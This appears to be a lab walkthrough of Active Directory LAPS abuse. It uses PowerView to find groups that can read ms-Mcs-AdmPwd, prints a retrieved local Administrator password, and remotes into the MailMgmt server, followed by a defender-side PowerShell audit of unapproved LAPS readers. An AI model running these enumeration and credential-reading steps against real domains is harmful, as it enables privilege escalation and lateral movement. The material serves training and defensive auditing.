First, let’s load PowerView:

. .\PowerView.ps1

Now let’s get the LAPS permissions:

Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectAceType -Like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -Match 'ReadProperty')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_}

As observed, the StudentUsers group can read the ms-Mcs-AdmPwd attribute on the MailMgmt server.

Now let’s read the ms-Mcs-AdmPwd attribute:

Get-DomainComputer | Where-Object samaccountname -match mailmgmt | select samaccountname, ms-Mcs-AdmPwd

As we can see, we got the password:

Username: us-mailmgmt\Administrator
Password: ikmY,96J-8!XmB

Now let’s PS Remote to the MailMgmt server:

Enter-PSSession -ComputerName us-mailmgmt -Credential (Get-Credential)

And we are Administrator on the MailMgmt server.
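
The LAPS permission enumeration earlier in this walkthrough can also be run as a defender-side audit. The following is an added example, not part of the original write-up: it compares ACE records against an approved list of LAPS readers and reports everyone else, including principals holding GenericAll or all extended rights, which also expose the confidential ms-Mcs-AdmPwd attribute. The function name, the EXAMPLE domain, the OU DNs and every principal other than StudentUsers are assumptions made for illustration.

```powershell
# Added example: constructed sample ACE records, not real output.
# Property names mirror what the enumeration pipeline emits; the EXAMPLE domain,
# the OU DNs and every principal except StudentUsers are made-up placeholders.
$aces = @(
    [pscustomobject]@{ ObjectDN = 'OU=MailMgmt,DC=example,DC=local'; ObjectAceType = 'ms-Mcs-AdmPwd'; ActiveDirectoryRights = 'ReadProperty, ExtendedRight'; IdentityName = 'EXAMPLE\StudentUsers' }
    [pscustomobject]@{ ObjectDN = 'OU=MailMgmt,DC=example,DC=local'; ObjectAceType = 'ms-Mcs-AdmPwd'; ActiveDirectoryRights = 'ReadProperty, ExtendedRight'; IdentityName = 'EXAMPLE\LAPS-Admins' }
    [pscustomobject]@{ ObjectDN = 'OU=Servers,DC=example,DC=local';  ObjectAceType = 'All';           ActiveDirectoryRights = 'ExtendedRight';               IdentityName = 'EXAMPLE\HelpDesk' }
    [pscustomobject]@{ ObjectDN = 'OU=Servers,DC=example,DC=local';  ObjectAceType = $null;           ActiveDirectoryRights = 'GenericAll';                  IdentityName = 'EXAMPLE\Domain Admins' }
)

# Hypothetical helper: returns one record per ACE that lets a principal
# outside the approved list read the LAPS password.
function Find-UnapprovedLapsReader {
    param(
        [Parameter(Mandatory)] [object[]] $Ace,
        [Parameter(Mandatory)] [string[]] $ApprovedReader
    )
    foreach ($a in $Ace) {
        $rights = "$($a.ActiveDirectoryRights)"
        $reason = $null
        if ($a.ObjectAceType -eq 'ms-Mcs-AdmPwd' -and $rights -match 'ReadProperty') {
            # Same condition as the filter used in the walkthrough
            $reason = 'ReadProperty on ms-Mcs-AdmPwd'
        }
        elseif ($rights -match 'GenericAll') {
            $reason = 'GenericAll (includes all extended rights)'
        }
        elseif ($rights -match 'ExtendedRight' -and $a.ObjectAceType -in @($null, '', 'All')) {
            # Unscoped extended rights also cover confidential attributes
            $reason = 'All extended rights'
        }
        # -notin compares strings case-insensitively
        if ($reason -and $a.IdentityName -notin $ApprovedReader) {
            [pscustomobject]@{ OU = $a.ObjectDN; Principal = $a.IdentityName; Reason = $reason }
        }
    }
}

# With this approved list, StudentUsers and HelpDesk are reported.
Find-UnapprovedLapsReader -Ace $aces -ApprovedReader 'EXAMPLE\LAPS-Admins', 'EXAMPLE\Domain Admins' |
    Format-Table -AutoSize
```

In a live audit, the records would come from the ACL enumeration itself rather than the constructed array, and each reported principal is reviewed against who is meant to manage that OU.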